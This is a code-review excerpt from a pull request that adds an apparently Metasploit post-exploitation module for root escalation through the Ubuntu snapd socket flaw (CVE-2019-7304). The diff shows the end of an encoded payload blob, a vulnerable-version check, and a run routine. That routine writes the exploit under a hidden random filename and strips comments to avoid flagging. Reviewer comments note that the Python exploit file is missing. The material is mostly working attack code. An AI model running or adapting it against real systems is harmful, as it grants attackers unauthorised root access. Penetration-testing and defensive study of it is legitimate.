modules/post/linux/escalate/ubuntu_snapd_socket_privesc.rb

```diff
@@ -0,0 +1,219 @@
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+        AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=='
+      ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def check
+    ubuntu_release = cmd_exec('grep "VERSION_ID" /etc/os-release').split('=')[1].gsub('"', '')
+    ubuntu_release = Rex::Version.new(ubuntu_release)
+    unless command_exists?('snap')
+      return Msf::Exploit::CheckCode::Safe('Snap executable not found')
+    end
+
+    snapd_version = cmd_exec('snap version | grep snapd').split(' ')[1]
+    snapd_version = Rex::Version.new(snapd_version)
+    print_status("Found snapd #{snapd_version} on Ubuntu #{ubuntu_release}")
+    if snapd_version < Rex::Version.new('2.34.2') &&
+       (
+          ubuntu_release == Rex::Version.new('14.04') ||
+          ubuntu_release == Rex::Version.new('16.04') ||
+          ubuntu_release == Rex::Version.new('18.04')
+        )
+      return Msf::Exploit::CheckCode::Appears('Vulnerable version of snapd found')
+    elsif ubuntu_release == Rex::Version.new('18.10') && snapd_version < Rex::Version.new('2.35.5')
+      return Msf::Exploit::CheckCode::Appears('Vulnerable version of snapd found')
+    end
+
+    Msf::Exploit::CheckCode::Safe('Non-vulnerable version of snapd found')
+  end
+
+  def strip_python_comments(code)
+    code.gsub('^\s*#[^!].*$', '').gsub('^\s""".*?"""$', '')
+  end
+
+  def find_exec_program
+    return 'python' if command_exists?('python')
+    return 'python3' if command_exists?('python3')
+
+    return false
+  end
+
+  def run
+    if check == Msf::Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'System not vulnerable')
+    end
+    # Check if we're already root
+    if is_root? && !datastore['ForceExploit']
+      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override')
+    end
+
+    # Make sure we can write our socket
+    unless writable? base_dir
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
+    end
+
+    python_binary = find_exec_program
+
+    fail_with(Failure::NotFound, 'The python binary was not found') unless python_binary
+
+    vprint_status("Using '#{python_binary}' to run exploit")
+
+    executable_name = ".#{Rex::Text.rand_text_alphanumeric(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    temp_file = Rex::Quickfile.new('dirty_sockv2.py')
+    # strip comments and other flagable things
+    code = strip_python_comments(File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-7304', 'dirty_sockv2.py')))
```

Comment:
```suggestion
    code = strip_python_comments(exploit_data('CVE-2019-7304', 'dirty_sockv2.py'))
```

Reply:
Also it looks like this Python exploit code is missing? exploits/CVE-2019-7304 would also be a good location for the default SquashFS data file.